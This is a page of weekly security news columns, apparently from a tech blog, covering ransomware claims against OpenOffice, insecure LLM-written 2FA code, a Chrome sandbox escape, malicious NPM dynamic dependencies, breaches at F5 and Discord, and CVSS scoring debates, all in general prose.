This Week In Security: Bogus Ransom, WordPress Plugins, And KASLR

There’s another ransomware story this week, but this one comes with a special twist. If you’ve followed this column for long, you’re aware that ransomware has evolved beyond just encrypting files. Perhaps we owe a tiny bit of gratitude to ransomware gangs for convincing everyone that backups are important. The downside to companies getting their backups in order is that these criminals are turning to other means to extort payment from victims. Namely, exfiltrating files and releasing them to the public if the victim doesn’t pay up. And this is the situation in which the Akira ransomware actors claim to have Apache’s OpenOffice project.

There’s just one catch. Akira is threatening to release 23 GB of stolen documents, which include employee information — and the Apache Software Foundation says those documents don’t exist. OpenOffice hasn’t received a demand and can’t find any evidence of a breach. It seems likely that Akira has hit some company, but not part of the Apache Software Foundation. Possibly someone that heavily uses OpenOffice, or even provides some level of support for that application. There is one more wrinkle here.

Since Apache OpenOffice is an open source software project, none of our contributors are paid employees for the project or the foundation…

Continue reading “This Week In Security: Bogus Ransom, WordPress Plugins, And KASLR”

This Week In Security: Vibecoding, Router Banning, And Remote Dynamic Dependencies

Vibecoding. What could possible go wrong? That’s what [Kevin Joensen] of Baldur wondered, and to find out he asked Anthropic’s Sonnet 4.5 to build a secure login with Two Factor Authentication (2FA). And to the LLM’s credit, it builds the app as requested. [Kevin] took a peek under the hood to see how well the security was handled, and it wasn’t great.

Up first, the Flask app doesn’t have any rate-limiting for guessing that time-based 2FA code. A 6-digit time-based 2FA only works if you can’t try all the possibilities before a given code expires. So what does a vibecoder do, once this has been noticed? Ask the LLM to fix it of course. Here we take a slightly different approach, prompting the AI to double-check its work: “Is there any security features missing in 2fa verify step?” The answer is an impressive:

Great question! Yes, there are several critical security features missing from the 2FA verification step. Let me highlight the most important ones:🚨 Critical Security Issues1. No Rate Limiting (MOST CRITICAL)

But the critical question, can it properly fix its mistake? The AI adds the flask-limiter library and chooses 10 attempts per minute, which is a bit loose, but not unreasonable. There’s still an issue, that those attempts are limited by IP address instead of user login. All it takes to bypass that rate limiting is a pool of IP addresses.

This experiment starts to go off the rails, as [Kevin] continues to prompt the LLM to look for more problems in its code, and it begins to hallucinate vulnerabilities, while not fixing the actual problem. LLMs are not up to writing secure code, even with handholding.

But surely the problem of LLMs making security mistakes isn’t a real-world problem, right? Right? Researchers at Escape did a survey of 5,600 vibecoded web applications, and found 2,000 vulnerabilities. Caveat Vibetor.

“Secure” Enclave

A few weeks ago we talked about Battering RAM and Wiretap — attacks against Trusted Execution Environments (TEEs). These two attacks defeated trusted computing technologies, but were limited to DDR4 memory. Now we’re back with TEE-fail, a similar attack that works against DDR5 systems.

This is your reminder that very few security solutions hold up against a determined attack with physical access. The Intel, AMD, and Nvidia TEE solutions are explicitly ineffective against such physical access. The problem is that no one seemed to be paying attention to that part of the documentation, with companies ranging from Cloudflare to Signal getting this detail wrong in their marketing.

Banning TP-Link

News has broken that the US government is considering banning the sale of new TP-Link network equipment, calling the devices a national security risk.

I have experience with TP-Link hardware: Years ago I installed dozens of TL-WR841 WiFi routers in small businesses as they upgraded from DSL to cable internet. Even then, I didn’t trust the firmware that shipped on these routers, but flashed OpenWRT to each of them before installing. Fun fact, if you go far enough back in time, you can find my emails on the OpenWRT mailing list, testing and even writing OpenWRT support for new TP-Link hardware revisions.

From that experience, I can tell you that TP-Link isn’t special. They have terrible firmware just like every other embedded device manufacturer. For a while, you could run arbitrary code on TP-Link devices by putting it inside backticks when naming the WiFi network. It wasn’t an intentional backdoor, it was just sloppy code. I’m reasonably certain that this observation still holds true. TP-Link isn’t malicious, but their products still have security problems. And at this point they’re the largest vendor of cheap networking gear with a Chinese lineage. Put another way, they’re in the spotlight due to their own success.

There is one other element that’s important to note here. There is still a significant TP-Link engineering force in China, even though TP-Link Systems is a US company. TP-Link may be subject to the reporting requirements of the Network Product Security legislation. Put simply, this law requires that when companies discover vulnerabilities, they must disclose the details to a particular Chinese government agency. It seems likely that this is the primary concern in the minds of US regulators, that threat actors cooperating with the Chinese government are getting advanced notice of these flaws. The proposed ban is still in proposal stage, and no action has been taken on it yet.

Sandbox Escape

In March there was an interesting one-click exploit that was launched via phishing links in emails. Researchers at Kaspersky managed to grab a copy of the malware chain, and discovered the Chrome vulnerability used. And it turns out it involves a rather novel problem. Windows has a pair of APIs to get handles for the current thread and process, and they have a performance hack built-in: Instead of returning a full handle, they can return -1 for the current process and -2 for the current thread.

Now, when sandboxed code tries to use this pseudo handle, Chrome does check for the -1 value, but no other special values, meaning that the “sandboxed” code can make a call to the local thread handle, which does allow for running code gadgets and running code outside the sandbox. Google has issued a patch for this particular problem, and not long after Firefox was patched for the same issue.

NPM and Remote Dynamic Dependencies

It seems like hardly a week goes by that we aren’t talking about another NPM problem. This time it’s a new way to sneak malware onto the repository, in the form of Remote Dynamic Dependencies (RDD). In a way, that term applies to all NPM dependencies, but in this case it refers to dependencies hosted somewhere else on the web. And that’s the hook. NPM can review the package, and it doesn’t do anything malicious. And when real users start downloading it, those remote packages are dynamically swapped out with their malicious versions by server-side logic.

Installing one of these packages ends with a script scooping up all the data it can, and ex-filtrating it to the attacker’s command and control system. While there isn’t an official response from NPM yet, it seems inevitable that NPM packages will be disallowed from using these arbitrary HTTP/HTTPS dependencies. There are some indicators of compromise available from Koi.

Bits and Bytes

Python deserialization with Pickle has always been a bit scary. Several times we’ve covered vulnerabilities that have their root in this particular brand of unsafe deserialization. There’s a new approach that just may achieve safer pickle handling, but it’s a public challenge at this point. It can be thought of as real-time auditing for anything unsafe during deserialization. It’s not ready for prime time, but it’s great to see the out-of-the-box thinking here.

This may be the first time I’ve seen remote exploit via a 404 page. But in this case, the 404 includes the page requested, and the back-end code that injects that string into the 404 page is vulnerable to XML injection. While it doesn’t directly allow for code execution, this approach can result in data leaks and server side request forgeries.

And finally, there was a sketchy leak, that may be information on which mobile devices the Cellebrite toolkit can successfully compromise. The story is that [rogueFed] sneaked into a Teams meeting to listen in and grab screenshots. The real surprise here is that GrapheneOS is more resistant to the Cellebrite toolkit than even the stock firmware on phones like the Pixel 9. This leak should be taken with a sizable grain of salt, but may turn out to be legitimate.

This Week In Security: Court Orders, GlassWorm, TARmageddon, And It Was DNS

This week, a US federal court has ruled that NSO Group is no longer allowed to use Pegasus spyware against users of WhatsApp. And for their trouble, NSO was also fined $4 million. It’s unclear how much this ruling will actually change NSO’s behavior, as it intentionally stopped short of applying to foreign governments.

There may be an unexpected source of leverage the US courts can exert over NSO, with the news that American investors are acquiring the company. Among the requirements of the ruling is that NSO cannot reverse engineer WhatsApp code, cannot create new WhatsApp accounts, and must delete any existing WhatsApp code in their possession. Whether this actually happens remains to be seen.

Continue reading “This Week In Security: Court Orders, GlassWorm, TARmageddon, And It Was DNS”

This Week In Security: F5, SonicWall, And The End Of Windows 10

F5 is unintentionally dabbling in releasing the source code behind their BIG-IP networking gear, announcing this week that an unknown threat actor had access to their internal vulnerability and code tracking systems. This security breach was discovered on August 9th, and in the time since, F5 has engaged with CrowdStrike, Mandiant, and NCC Group to review what happened.

So far it appears that the worst result is access to unreleased vulnerabilities in the F5 knowledge management system. This means that any unpatched vulnerabilities were effectively 0-days, though the latest set of patches for the BIG-IP system has fixed those flaws. There aren’t any reports of those vulnerabilities being exploited in the wild, and F5 has stated that none of the leaked vulnerabilities were critical or allowed for remote exploitation.

Slightly more worrying is that this access included the product development environment. The problem there isn’t particularly the leak of the source code — one of the covered projects is NGINX, which is already open source software. The real danger is that changes could have been surreptitiously added to those codebases. The fact that NGINX is Open Source goes a long way to alleviate that danger, and when combined with the security built into tools like git, it seems very unlikely that malicious code could be sneaked into the NGINX public code base. A thorough review of the rest of the F5 codebases has similarly come up negative, and so far it looks like the supply-chain bullet has been dodged. Continue reading “This Week In Security: F5, SonicWall, And The End Of Windows 10”

This Week In Security: ID Breaches, Code Smell, And Poetic Flows

Discord had a data breach back on September 20th, via an outsourced support contractor. It seems it was a Zendesk instance that was accessed for 58 hours through a compromised contractor user account. There have been numbers thrown around from groups claiming to be behind the breach, like 1.6 Terabytes of data downloaded, 5.5 million user affected, and 2.1 million photos of IDs.

Discord has pushed back on those numbers, stating that it’s about 70,000 IDs that were leaked, with no comments on the other claims. To their credit, Discord has steadfastly refused to pay any ransom. There’s an interesting question here: why were Discord users’ government issued IDs on record with their accounts?

The answer is fairly simple: legal compliance. Governments around the world are beginning to require age verification from users. This often takes the form of a scan of valid ID, or even taking a picture of the user while holding the ID. There are many arguments about whether this is a good or bad development for the web, but it looks like ID age verification is going to be around for a while, and it’ll make data breaches more serious.

In similar news, Salesforce has announced that they won’t be paying any ransoms to the group behind the compromise of 39 different Salesforce customers. This campaign was performed by calling companies that use the Salesforce platform, and convincing the target to install a malicious app inside their Saleforce instance. Continue reading “This Week In Security: ID Breaches, Code Smell, And Poetic Flows”

This Week In Security: CVSS 0, Chwoot, And Not In The Threat Model

This week a reader sent me a story about a CVE in Notepad++, and something isn’t quite right. The story is a DLL hijack, a technique where a legitimate program’s Dynamic Link Library (DLL) is replaced with a malicious DLL. This can be used for very stealthy persistence as well as escalation of privilege. This one was assigned CVE-2025-56383, and given a CVSS score of 8.4.

The problem? Notepad++ doesn’t run as a privileged user, and the install defaults to the right permissions for the folder where the “vulnerable” DLL is installed. Or as pointed out in a GitHub issue on the Proof of Concept (PoC) code, why not just hijack the notepad++ executable?

This is key when evaluating a vulnerability write-up. What exactly is the write-up claiming? And what security boundary is actually being broken? The Common Weakness Enumeration (CWE) list can be useful here. This vulnerability is classified as CWE-427, an uncontrolled search path element — which isn’t actually what the vulnerability claims, and that’s another clue that something is amiss here. In reality this “vulnerability” applies to every application that uses a DLL: a CVSS 0.

Continue reading “This Week In Security: CVSS 0, Chwoot, And Not In The Threat Model”

This Week In Security: CVSS 4, OAuth, And ActiveMQ

We’ve talked a few times here about the issues with the CVSS system. We’ve seen CVE farming, where a moderate issue, or even a non-issue, gets assigned a ridiculously high CVSS score. There are times a minor problem in a library is a major problem in certain use cases, and not an issue at all in others. And with some of those issues in mind, let’s take a look at the fourth version of the Common Vulnerability Scoring System.

One of the first tweaks to cover is the de-emphasis of the base score. Version 3.1 did have optional metrics that were intended to temper the base score, but this revision has beefed that idea up with Threat Metrics, Environmental Metrics, and Supplemental Metrics. These are an attempt to measure how likely it is that an exploit will actually be used. The various combinations have been given names. Where CVSS-B is just the base metric, CVSS-BT is the base and threat scores together. CVSS-BE is the mix of base and environmental metrics, and CVSS-BTE is the combination of all three.

Another new feature is multiple scores for a given vulnerability. A problem in a library is first considered in a worst-case scenario, and the initial base score is published with those caveats made clear. And then for each downstream program that uses that library, a new base score should be calculated to reflect the reality of that case. Continue reading “This Week In Security: CVSS 4, OAuth, And ActiveMQ”